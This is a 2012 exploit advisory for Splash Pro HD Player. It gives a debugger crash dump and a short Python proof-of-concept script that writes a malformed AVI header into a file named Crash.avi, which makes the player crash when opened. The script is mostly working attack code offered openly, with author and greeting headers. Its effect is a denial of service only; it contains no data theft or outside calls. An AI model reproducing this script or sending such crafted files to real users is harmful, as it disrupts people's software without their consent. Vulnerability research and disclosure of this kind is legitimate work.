Splash Pro HD Player denial of service proof of concept exploit that creates a malicious .avi file.
4f32a79f26cac44c8b87a9a2d0254b51a8ce32d6876f9726cd59cf6f05bba627
###########################################################################################################
Application : Splash Pro Hd Player (.avi) Denial of Service
Date : 02/03/2012
Auther : Senator of Pirates
E-Mail : Senator.of.Pirates.team@gmail.com
FaceBook : /SenatorofPirates
Greet : i greet to Gjoko 'LiquidWorm' Krstic and my friends in anywhere and
also every Moroccan
###########################################################################################################
Bug :
----
eax=023211e0 ebx=02327760 ecx=00000001 edx=45520fea esi=bce8af7e
edi=45523258
eip=0045ed3e esp=0c17ff08 ebp=02323448 iopl=0 nv up ei pl nz ac po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010212
*** ERROR: Module load completed but symbols could not be loaded for
image00400000
image00400000+0x5ed3e:
0045ed3e 803e4c cmp byte ptr [esi],4Ch
ds:0023:bce8af7e=??
############################################################################################################
Code :
----------------
PoC = "\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54"
PoC += "\x72\x22\x00\x00\x68\x64\x72\x6c"
payload = (PoC)
f = open("Crash.avi","wb")
f.write(payload)
f.close()